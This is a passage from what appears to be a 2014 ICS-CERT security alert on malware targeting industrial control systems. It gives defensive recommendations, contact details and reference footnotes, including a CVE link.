ICS－CERT recommends that users take defensive measures to minimize the risk of exploitation due to this unsecure device configuration of these vulnerabilities．Specifically，users should：
－Minimize network exposure for all control system devices．Control system devices should not directly face the Internet．
－Locate control system networks and devices behind firewalls，and isolate them from the business network．
－If remote access is required，employ secure methods，such as Virtual Private Networks（VPNs），recognizing that VPN is only as secure as the connected devices．
－Remove，disable，or rename any default system accounts wherever possible．
－Apply patches in the ICS environment，when possible to mitigate known vulnerabilities．
－Implement policies requiring the use of strong passwords．
－Monitor the creation of administrator level accounts by third－party vendors．
ICS－CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures．
ICS－CERT also provides a recommended practices section for control systems on the ICS－CERT web site（http：／／ics－ cert．us－cert．gov）．Several recommended practices are available for reading or download，including Improving Industrial Control Systems Cybersecurity with Defense－in－Depth Strategies．

Organizations that observe any suspected malicious activity should follow their established internal procedures and report their findings to ICS－CERT for tracking and correlation against other incidents．

[^0]
## Contact Information

For any questions related to this report，please contact ICS－CERT at：

Toll Free: 1-877-776-7585
International Callers: (208) 526-0900
For industrial control systems security information and incident reporting: http://ics-cert.us-cert.gov
ICS-CERT continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.

Was this document helpful? Yes | Somewhat | No

## I Want To

Report an ICS incident to ICS-CERT唄 Report an ICS software vulnerability Get information about Reporting Join the Secure Portal回

## Subscribe to Alerts

Receive security alerts, advisories, announcements, and other updates.

> Enter your email address

Mailing Lists and
Feeds

Follow ICS-CERT on Twitter

## Contact Us

U.S. Toll Free: (877) 776-7585

International: (208) 526-0900
Download PGP/GPG keys
ICS-Related Cyber Activity
General ICS Questions

Home | FAQ | Traffic Light Protocol | Privacy \& Use | Accessibility | Get a PDF Reader
US-CERT is part of the Department of Homeland Security.


[^0]:    a．ICS－CERT encourages US asset owners and operators to join the control systems compartment of the US－CERT secure portal．To request access to the secure portal send your name，email address，and company affiliation to ics－cert＠hq．dhs．gov．
    b．Sandworm to Blacken：The SCADA Connection，http：／／blog．trendmicro．com／trendlabs－security－intelligence／sandworm－to－b．．．圈 web site last accessed October 28， 2014.
     2014.
    d．NVD，http：／／web．nvd．nist．gov／view／vuln／detail？vulnId＝CVE－2014－4114，web site last accessed October 28， 2014.
    e．GE Intelligent Platforms，http：／／support．ge－ip．com／supportindex？page＝kbchannel圈．web site last accessed October 28， 2014.
    f．GE，http：／／www．ge．com／security 疋 web site last accessed October 28， 2014.
    g．See＂Nov 21， 2014 （second publication）Siemens Industrial Security Website：Update on ICS－CERT Alert on malware targeting SIMATIC WinCC＂（http：／／www．industry．siemens．com／topics／global／en／industrial－security／new．．．家）

